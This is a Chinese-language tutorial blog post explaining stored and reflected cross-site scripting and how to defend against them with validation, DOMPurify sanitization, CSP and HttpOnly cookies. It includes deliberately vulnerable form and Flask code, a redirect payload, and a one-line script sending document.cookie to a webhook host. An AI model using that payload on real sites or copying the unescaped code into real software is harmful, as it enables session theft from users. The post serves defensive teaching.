Cross Site Scripting (XSS) 攻擊及防制

XSS (Cross-Site Scripting) 是一種網頁安全漏洞，允許攻擊者注入惡意腳本到網頁中，進而在其他使用者的瀏覽器上執行。

---

漏洞實現

Stored 儲存型 XSS

這邊舉個簡單的留言板當作舉例，通常都有網購看評價的經驗吧\owo/

這邊假設今天的評論前端長以下這樣

<form action="/submit" method="post">
  <input type="text" name="review" placeholder="幫商品留下評價吧！">
  <input type="submit" value="送出">
</form>

加上剛好後端工程師也寫得很雷，直接將你們的 review 存在主機中，不做任何修改

@app.route('/submit', methods=['POST'])
def submit_message():
    review = request.form['review']
    # 儲存 review 到資料庫中，這邊 code 我就亂打，看得懂概念就行
    review_db.append(review)
    return redirect('/')

然後前端留言也是直接輸出，不錯任何判斷

<!-- 顯示所有留言 -->
{% for rev in review %}
  <p>{{ rev }}</p>
{% endfor %}

所以我今天如果滿肚子壞水的在評論區輸入下方程式碼的話，每個只要載入我留言的人就會被 Rickroll XD
(location.href 代表者將網址重定位，JS 語法)

<script>location.href="https://www.youtube.com/watch?v=dQw4w9WgXcQ"</script>

當然這樣看起來還好，但如果今天我帶入的內容是像下面這串，我就可以把你的 cookie 透過 webhook 等方式傳來給我，我就可以來做壞壞的事情（登入、分析日常習慣等）

location.href="https://webhook.com?cookie="+document.cookie;

可以在 Cookie 中加上 HttpOnly 來去禁止非伺服器之外其他來源取用 Cookie，有興趣可以參考這裡

Reflected 反射型 XSS

你可以直接點點看這個網站，反射型 XSS 通常會直接將參數藏在網址參數中，再透過各種方式讓被害人無意間點進去。

---

如何防制

防制 XSS 最好的方法，就是 “Never Trust User Input（永遠不相信用戶輸入）”，這邊的輸入不只包含表單輸入，還有網址帶的參數等等

1. 輸入輸出驗證：透過 Regex 等公式檢視該輸入是否合法
2. HTML Sanitization(淨化?)：透過套件分析，來去除可能造成 XSS 等程式碼，並且保留原本文字輸出。可以參考 DOMPurify
3. 設定 CSP Header: Content Security Policy 可以有效限制外部腳本運行，但是有時候被 XSS 攻擊利用的也可能是自己網站的腳本

---

Reference

• Cross Site Scripting Prevention Cheat Sheet
• What you need to know about inbuilt browser HTML sanitization
• Cross-site Scripting (XSS)
• PortSwigger - Cross-site scripting
• XSS 攻擊和防堵